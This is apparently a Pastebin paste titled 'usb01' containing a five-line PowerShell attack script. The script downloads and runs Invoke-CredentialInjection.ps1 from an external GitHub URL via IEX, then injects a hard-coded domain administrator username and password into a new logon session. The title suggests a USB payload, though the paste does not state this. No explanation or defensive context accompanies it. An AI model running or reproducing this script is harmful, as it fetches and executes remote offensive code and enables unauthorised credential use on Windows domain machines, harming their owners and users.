mymoishy

usb01

Jul 1st, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-CredentialInjection/Invoke-CredentialInjection.ps1');
  2.  
  3. $domain = (Get-WmiObject Win32_ComputerSystem).Domain;
  4.  
  5. Invoke-CredentialInjection -DomainName $domain -UserName "administrator" -Password "Password1" -NewWinLogon -AuthPackage Msv1_0
Add Comment
Please, Sign In to add comment